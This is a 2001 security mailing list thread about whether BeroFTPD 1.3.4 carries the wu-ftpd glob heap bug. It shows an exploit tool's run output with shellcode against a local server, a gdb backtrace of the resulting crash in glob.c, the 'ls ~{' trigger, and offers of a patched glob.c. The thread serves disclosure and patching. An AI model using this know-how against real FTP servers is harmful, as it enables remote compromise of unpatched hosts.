Re: Older BeroFTPD glob

From: Eduardo Cruz (eduardo.cruz@tsg.com)
Date: 12/10/01


From: "Eduardo Cruz" <eduardo.cruz@tsg.com>
To: "KF" <dotslash@snosoft.com>, <vuln-dev@security-focus.com>
Date: Mon, 10 Dec 2001 02:44:34 +0100

Hi KF, yes, by default of course it is.
And past and future "standard" wu-ftpd bugs will affect BeroFTPD.
For 1.3.4 just replace glob.c with the glob.c I attached to my last post.
And don't forget that there are a few older wu-ftpd bugs that are present
in Bero. Have fun :)

----- Original Message -----
From: "KF" <dotslash@snosoft.com>
To: <eduardo.cruz@tsg.com>; <vuln-dev@security-focus.com>
Sent: Friday, January 02, 1970 12:09 AM
Subject: re: Older BeroFTPD glob

> In Eduardo's reply I did not find it clear whether BeroFTPD 1.3.4 was or was
> not vulnerable in a default compile. I compiled it from the latest source on
> the wu-ftpd.org ftp server. Bare, with no patches, I get the following
> result, which was the same with earlier versions. Again I am on a PPC
> Linux box:
>
> [root@ibook root]# java wuwarez 42424242 0 localhost anonymous
> Shellcode is 44 bytes long
> return is 42424242
> Got Socket
> Sleeping so that you can attach a debugger
> 220 ibook FTP server (BeroFTPD 1.3.4(2) Mon Dec 1 23:09:32 EST 2003) ready.
> Sending username
> 331 Guest login ok, send your complete e-mail address as password.
> sending mal buffer as the passwd
> ;230 Guest login ok, access restrictions apply.
> Populate Heap...needs more work
> (program exit)
> [root@ibook root]#
>
> (This is what we saw when we attached the debugger)
>
> [root@ibook src]# ps -ef | grep ftpd
> ftp 2035 790 0 14:55 ? 00:00:00 ftpd: localhost.localdomain: anonymous
> [root@ibook src]# gdb ./ftpd 2035
> Program received signal SIGSEGV, Segmentation fault.
> 0xfeb6cfc in free () from /lib/libc.so.6
> (gdb) bt
> #0 0xfeb6cfc in free () from /lib/libc.so.6
> #1 0x10010b58 in blkfree (av0=0x42424242) at glob.c:604
> #2 0x1000dd04 in yyparse () at ftpcmd.y:1246
> #3 0x10002cac in main (argc=268566528, argv=0x7ffffc74,
> envp=0x1003e828) at ftpd.c:1221
> #4 0xfe5e308 in __libc_start_main () from /lib/libc.so.6
>
> Detaching from program: /root/BeroFTPD-1.3.4/src/./ftpd, Pid 2035
>
> -KF
>
>
> From: "Eduardo Cruz" <eduardo.cruz@tsg.com>
> Date: Sun Dec 09, 2001 05:00:10 AM US/Pacific
> To: "KF" <dotslash@snosoft.com>, <vuln-dev@security-focus.com>
> Subject: Re: Older BeroFTPD glob
>
> Connected to localhost.
> 220 cimitarra FTP server (BeroFTPD 1.3.4(1) Wed May 30 18:22:32 CEST 2001) ready.
> Name (localhost:root): anonymous
> 331 Guest login ok, send your complete e-mail address as password.
> Password:
> 230-Welcome, archive user! This is an experimental FTP server. If have any
> 230-unusual problems, please report them via e-mail to root@cimitarra
> 230-If you do have problems, please try using a dash (-) as the first character
> 230-of your password -- this will turn off the continuation messages that may
> 230-be confusing your ftp client.
> 230-
> 230 Guest login ok, access restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls ~{
> 200 PORT command successful.
> 550 Missing }
> ftp>
>
> Just patch glob.c yourself, or use mine, already patched (attached).
> And about the maintenance of BeroFTPD, as far as I know it has not been done
> for years.
> Anyway, apart from the bugs deriving from wu-ftpd, I don't see the point in
> maintaining Bero; I find it quite perfect as it is.
>
> have fun
>